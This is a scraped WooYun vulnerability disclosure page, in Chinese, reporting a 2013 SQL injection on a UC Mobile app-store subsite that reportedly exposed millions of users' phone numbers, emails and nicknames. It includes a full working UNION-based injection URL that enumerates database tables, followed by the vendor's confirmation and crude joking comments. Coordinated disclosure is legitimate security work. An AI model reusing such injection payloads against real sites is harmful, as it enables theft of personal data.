UC某分站注入850万条数据 | wooyun-2013-021534| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-021534

漏洞标题：UC某分站注入850万条数据

漏洞作者： Enjoy_Hacking

提交时间：2013-04-10 18:17

修复时间：2013-05-25 18:18

公开时间：2013-05-25 18:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-04-10：细节已通知厂商并且等待厂商处理中
2013-04-10：厂商已经确认，细节仅向厂商公开
2013-04-20：细节向核心白帽子及相关领域专家公开
2013-04-30：细节向普通白帽子公开
2013-05-10：细节向实习白帽子公开
2013-05-25：细节向公众公开

简要描述：

850万条数据包括昵称，手机号码，邮箱，下载的应用，手机型号等。
能干啥用我不知道，也许做黑产的知道。
保证没脱库，别查我水表，不信你们查日志去,顺便求礼物

详细说明：

http://bibei.uc.cn/bibei/wap/soft?productid=34734&from=%E9%A6%96%E9%A1%B5&sid=55b3bc12d7&user_phone=nokia.5800&ad_mark=%E9%A6%96%E9%A1%B5%E8%BD%AF%E4%BB%B6&tpl=999999.9%27+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C%28SELECT+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+FROM+%60information_schema%60.tables+WHERE+table_schema%3D0x657373656E7469616C5F736F6674%29%2C0x31303235343830303536%2C0x31303235343830303536--+a

撸一下就射出所有表名

漏洞证明：

修复方案：

求礼物~

版权声明：转载请注明来源 Enjoy_Hacking@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2013-04-10 19:15

厂商回复：

漏洞已确定，研发正在紧急处理，非常感谢Enjoy_Hacking提供漏洞消息。

漏洞评价：

2013-04-10 18:38 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

卧槽 850w 有这么多用户？？
2013-04-10 18:39 | isxenos ( 实习白帽子 | Rank:71 漏洞数:8 | 也好)

放开裤子让我来脱
2013-04-10 19:05 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言，如此这般。)

申明一下、里面没密码的
2013-04-10 19:24 | xsser ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

@Enjoy_Hacking 怪不得才10分
2013-04-10 22:16 | 专业种田 ( 核心白帽子 | Rank:1425 漏洞数:165 | 没有最专业的农民,只有更努力地耕耘..........)

其中有好几个我的号，抢小米2注册的，赶紧改密码:)
2013-05-10 19:18 | m4trix1 ( 路人 | Rank:10 漏洞数:2 | 绝对有jj)

我想说...那是85W吧
2013-05-25 18:27 | xfkxfk ( 核心白帽子 | Rank:2179 漏洞数:330 | 呵呵！)

我想说...那是85W吧。。。。850w吓死我了
2013-05-27 01:10 | LaTCue ( 普通白帽子 | Rank:105 漏洞数:24 | 满脑子的艺术细菌，当然，是人体艺术。)

@m4trix1 bibei_user_0-9
2013-05-27 17:07 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言，如此这般。)

@LaTCue bibei_user_0-9每个表85W、10个表850W

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-021534

漏洞标题：UC某分站注入850万条数据

相关厂商：UC Mobile

漏洞作者： Enjoy_Hacking

提交时间：2013-04-10 18:17

修复时间：2013-05-25 18:18

公开时间：2013-05-25 18:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Enjoy_Hacking@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-021534

漏洞标题：UC某分站注入850万条数据

相关厂商：UC Mobile

漏洞作者： Enjoy_Hacking

提交时间：2013-04-10 18:17

修复时间：2013-05-25 18:18

公开时间：2013-05-25 18:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-021534"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Enjoy_Hacking@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：